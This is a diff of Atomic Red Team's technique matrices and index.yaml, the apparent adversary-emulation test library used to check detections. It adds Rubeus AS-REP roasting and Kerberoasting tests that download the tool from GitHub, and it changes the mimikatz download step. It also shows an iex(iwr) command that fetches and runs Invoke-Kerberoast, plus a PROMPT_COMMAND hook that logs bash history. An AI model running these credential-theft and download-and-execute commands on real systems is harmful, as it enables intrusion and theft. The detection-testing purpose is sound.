 - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
   - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
@@ -149,6 +153,7 @@
 - T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1113 Screen Capture](../../T1113/T1113.md)
   - Atomic Test #5: Windows Screencapture [windows]
+  - Atomic Test #6: Windows Screen Capture (CopyFromScreen) [windows]
 - T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

atomics/Indexes/Matrices/linux-matrix.md

@@ -16,7 +16,7 @@
 | Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Escape to Host](../../T1611/T1611.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Local Account](../../T1087.001/T1087.001.md) |  | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Python](../../T1059.006/T1059.006.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) |  | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) |  | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Cloud Logs](../../T1562.008/T1562.008.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) |  | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) |  | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) |  | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) |  | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |

atomics/Indexes/Matrices/matrix.md

@@ -3,7 +3,7 @@
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
 | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AS-REP Roasting](../../T1558.004/T1558.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
 | [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Add-ins](../../T1137.006/T1137.006.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -32,7 +32,7 @@
 |  | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  | [Software Deployment Tools](../../T1072/T1072.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Direct Volume Access](../../T1006/T1006.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
-|  | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | [Screen Capture](../../T1113/T1113.md) |  | [Protocol Tunneling](../../T1572/T1572.md) |  |
+|  | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Cloud Logs](../../T1562.008/T1562.008.md) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | [Screen Capture](../../T1113/T1113.md) |  | [Protocol Tunneling](../../T1572/T1572.md) |  |
 |  | [Systemd Timers](../../T1053.006/T1053.006.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) |  | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  | [Unix Shell](../../T1059.004/T1059.004.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Escape to Host](../../T1611/T1611.md) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Network Sniffing](../../T1040/T1040.md) | [System Owner/User Discovery](../../T1033/T1033.md) |  | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Remote Access Software](../../T1219/T1219.md) |  |
 |  | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Service Discovery](../../T1007/T1007.md) |  | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Standard Encoding](../../T1132.001/T1132.001.md) |  |

atomics/Indexes/Matrices/windows-matrix.md

@@ -2,7 +2,7 @@
 | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
-| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AS-REP Roasting](../../T1558.004/T1558.004.md) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Add-ins](../../T1137.006/T1137.006.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |

atomics/Indexes/index.yaml

@@ -240,7 +240,64 @@ credential-access:
       - Dan Nutting, @KerberToast
       x_mitre_platforms:
       - Windows
-    atomic_tests: []
+      identifier: T1558.004
+    atomic_tests:
+    - name: Rubeus asreproast
+      auto_generated_guid: 615bd568-2859-41b5-9aed-61f6a88e48dd
+      description: |
+        Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
+        This build targets .NET 4.5.  If targeting a different version you will need to compile Rubeus
+      supported_platforms:
+      - windows
+      input_arguments:
+        local_folder:
+          description: Local path of Rubeus executable
+          type: Path
+          default: "$Env:temp"
+        local_executable:
+          description: name of the rubeus executable
+          type: String
+          default: rubeus.exe
+        out_file:
+          description: file where command results are stored
+          type: String
+          default: rubeus_output.txt
+        rubeus_url:
+          description: URL of Rubeus executable
+          type: url
+          default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Computer must be domain joined
+
+'
+        prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
+          {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Write-Host Joining this computer to a domain must be
+          done manually
+
+'
+      - description: 'Rubeus must exist
+
+'
+        prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit
+          0} else {exit 1}
+
+'
+        get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
+
+'
+      executor:
+        command: 'cmd.exe /c "#{local_folder}\#{local_executable}" asreproast /outfile:"#{local_folder}\#{out_file}"
+
+'
+        cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
+
+'
+        name: powershell
+        elevation_required: false
   T1552.003:
     technique:
       external_references:
@@ -1527,7 +1584,8 @@ credential-access:
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
         get_prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
-          Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
           Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
           New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
           Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
@@ -2014,7 +2072,8 @@ credential-access:
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
         get_prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
-          Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
           Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
           New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
           Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
@@ -2363,6 +2422,68 @@ credential-access:
           iex(iwr https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 -UseBasicParsing)
           Invoke-Kerberoast | fl
         name: powershell
+    - name: Rubeus kerberoast
+      auto_generated_guid: 14625569-6def-4497-99ac-8e7817105b55
+      description: |
+        Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
+        This build targets .NET 4.5.  If targeting a different version you will need to compile Rubeus
+      supported_platforms:
+      - windows
+      input_arguments:
+        local_folder:
+          description: Local path of Rubeus executable
+          type: Path
+          default: "$Env:temp"
+        local_executable:
+          description: name of the rubeus executable
+          type: String
+          default: rubeus.exe
+        out_file:
+          description: file where command results are stored
+          type: String
+          default: rubeus_output.txt
+        rubeus_url:
+          description: URL of Rubeus executable
+          type: url
+          default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe
+        flags:
+          description: command flags you would like to run (optional and blank by
+            default)
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Computer must be domain joined
+
+'
+        prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
+          {exit 0} else {exit 1}
+
+'
+        get_prereq_command: 'Write-Host Joining this computer to a domain must be
+          done manually
+
+'
+      - description: 'Rubeus must exist
+
+'
+        prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit
+          0} else {exit 1}
+
+'
+        get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
+
+'
+      executor:
+        command: 'cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags}
+          /outfile:"#{local_folder}\#{out_file}"
+
+'
+        cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
+
+'
+        name: powershell
+        elevation_required: false
   T1555.001:
     technique:
       created: '2020-02-12T18:55:24.728Z'
@@ -2567,6 +2688,148 @@ credential-access:
           sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth
         name: sh
         elevation_required: true
+    - name: Logging bash history to syslog
+      auto_generated_guid: 0e59d59d-3265-4d35-bebd-bf5c1ec40db5
+      description: "There are several variables that can be set to control the appearance
+        of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents
+        of these variables are executed as if they had been typed on the command line.
+        The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable
+        and can be configured to write the latest \"bash history\" entries to the
+        syslog.\n\nTo gain persistence the command could be added to the users .bashrc
+        or .bash_aliases or the systems default .bashrc in /etc/skel/ \n"
+      supported_platforms:
+      - linux
+      dependency_executor_name: sh
+      dependencies:
+      - description: 'This test requires to be run in a bash shell and that logger
+          and tee are installed.
+
+'
+        prereq_command: |
+          if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
+          if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
+          if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
+        get_prereq_command: 'echo ""
+
+'
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")'
